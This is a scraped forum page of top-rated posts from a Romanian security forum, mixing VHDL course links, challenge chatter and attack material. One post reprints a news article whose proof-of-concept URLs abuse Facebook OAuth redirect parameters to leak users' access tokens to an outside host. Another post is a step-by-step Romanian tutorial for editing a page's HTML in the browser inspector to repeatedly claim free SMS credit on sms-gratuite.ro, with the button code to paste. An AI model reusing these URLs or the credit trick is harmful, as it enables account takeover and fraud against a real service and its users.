Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 04/05/13 in all areas

  1. Raspunsurile prin PM! Premiu: +1 respect. Solvers: - Sweby - TheTime - akkiliON - denjacker - Cor3Quad - Gecko - DarkyAngel - xTremeSurfer - StrXt Challenge closed. Congrats to all solvers!
    1 point
  2. Scopul lucr?rii Însu?irea principiilor privind implementarea unui algoritm de multiplicare (înmul?ire) în VHDL folosind modelarea mixt?. Este exemplificat? implementarea unui algoritm de multiplicare cu adunare repetat? ?i deplasare-stânga dreapta folosind o serie de componente modelate ?i testate în lucr?rile de laborator anterioare (sumatorul pe 8 bi?i, latch-ul pe 8 bi?i, registrul de deplasare configurabil ?i circuitul de control modelat ca ma?in? cu st?ri finite). http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab12_PAC2_VHDL_7.pdf Limbajul VHDL: http://andrei.clubcisco.ro/cursuri/f/f-sym/3cn2/VHDL.pdf Introducere in utilizarea limbajului VHDL : http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab6_PAC2_VHDL_1.pdf Modelarea ma?inilor cu st?ri finite în VHDL: http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab10_PAC2_VHDL_5.pdf Modelarea structural? ordonat? ?i modelarea comportamental? în VHDL : http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab9_PAC2_VHDL_4.pdf Modelarea data-flow ?i modelarea structural? în VHDL : http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab8_PAC2_VHDL_3.pdf Simulare ?i verificare a unui model VHDL cu ajutorul entit??ilor de test (testbench-uri) : http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab7_PAC2_VHDL_2.pdf Func?ii, proceduri ?i package-uri: http://www.etti.tuiasi.ro/pac/PAC2/PAC2_Laborator/Lab11_PAC2_VHDL_6.pdf
    1 point
  3. Prea tare acest challenge // Înc? mai e ceva // edit: Am terminat Nice challenge !
    1 point
  4. 49 din 70 au renuntat? Banuiesc ca numai userii RST-ului au raspuns (sau nu). Acum ca Gecko si FarSe au zis ca era si pe 9gag, in loc sa ganditi, faceti o vizita pe 9g.
    1 point
  5. In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth. This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts. For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program. Nir also demonstrated that an attacker is even able to gain knowledge of which application their victims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks. Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users. POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1 POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1 The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords. Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps. TheHackerNews
    1 point
  6. 15 RON/zi * 30 = 450 RON/luna. Daca te faci shaormar castigi de 2 ori mai bine. Daca te faci vanzator in Carrefour castigi de 3 ori mai bine. Daca te faci programator... Castigi mai bine.
    1 point
  7. Gilbert, don't make double posts on this forum, we don't like that. About this topic, I think that secured networks are always to be desired, even if we talk about a monster-like government. Why? Because there is a need for privacy everywhere, because some things are just not meant to be public. There are other ways to reveal their dark secrets and I don't believe that hacking for justice is a solution.
    1 point
  8. @Tiger9620: Trebuie XSS persistent. Mai incearca
    1 point
  9. ba voi chiar ii cantati in struna acesti "domn". cum sa ii dai lu' asta idei despre cum sa faca deface la o scoala? S C O A L A ! ! ! frate, tu asta care ai postat... daca este fosta ta scoala ce logica ai tu in actiunile tale cand zici ca vrei sa-i dai deface? fa-ma si pe mine sa inteleg ce poate sa faca o scoala atat de rau incat sa vrei sa-i dai deface? maine parca si vad pe altu destept tot ca tine ca vrea sa dea DDOS la un azil de batrani.
    -1 points
  10. Buna seara tuturor, Citind, https://rstforums.com/forum/65773-sms-gratuite-ro-free-account-charger.rst ne-a fost prezentat un website prin intermediul caruia contul nostru de pe sms-gratuite.ro se putea reincarca gratis de ori cate ori dorim. Mai jos va voi prezenta un tutorial pas cu pas despre cum sa va reincarcati voi singuri contul. Va recomand sa folositi Mozilla Firefox + addonul: Firebug. Se poate folosi si Google Chrome cu WebInspector. Sa incepem: 1. Avem un cont nou sau facem unul nou si ne logam pe cont. Vom fi intampinati de un mesaj: 2.Dupa ce dam pe "Am citit, inchide" vom ajunge in meniul principal al websiteului. Acolo putem constata ca nu avem niciun mesaj disponibil si ni se cere sa activam o optiune. Dam click: 3.In lista de oferte ce ne apare, ne uitam la cea gratuita. NU dam click stanga pe butonul "Inspect Element", ci click dreapta -> Inspect Element: 4.In casuta ce se deschide vom avea selectat cu albastru codul Javascript pentru acel buton. Vom da click dreapta pe el -> Copy HTML: 5.Dam paste intr-un notepad la acest cod: 6.Acum continuam procesul de "Cumparare" si dam click stanga pe butonul Cumpara: 7.Dam click pe "Activeaza optiunea": 8. Putem vedea ca optiunea noastra s-a activat si avem minute disponibile. Acum sa vedem cum o mai activam inca o data "Gratuit". Dam click pe "Oferte": 9. Observam ca butonul de "Cumpara" din optiunea Mixt 1 este sters, nu poate fi accesat si primim un mesaj informativ despre data la care il vom putea reactiva: 10.Din nou dam click dreapta pe el -> Inspect Element: 11.Se va deschide din nou intr-o casuta jos codul aferent acestuia selectat cu albastru. Dam click dreapta pe el -> Edit HTML: 12.In fereastra de jos vom observa codul acestuia: 13.Stergem acest cod si facem paste la codul copiat la Pasul 5 in notepad, deselectam textul si apasam ENTER: 14. Vom observa ca butonul "Cumpara" apare din nou si putem da click pe el: 15.In continuare vom putea da click fara probleme pe "Activeaza optiunea": 16.Observam ca optiunea s-a activat si numarul de mesaje a crescut: Se pot repeta pasii 9-16 pentru reinnoiri succesive. Asta este tot, daca ati urmarit pasii cu atentie ar trebui sa functioneze si la voi. Pentru cei care au deja un cont facut si activata deja optiunea Mixt 1, pentru reactivare sariti direct la Pasul 9 iar la Pasul 13 faceti paste la urmatorul cod: <button onclick="$('#cacat').load('/include/modal.php?a=of&oid=1',function(){$('#oferta').modal()});" class="btn btn-success ">Cump?r?</button> Pentru cei care doresc sa descarce pozele in format bitmap la rezolutie buna: http://adf.ly/Lobr5
    -1 points
×
×
  • Create New...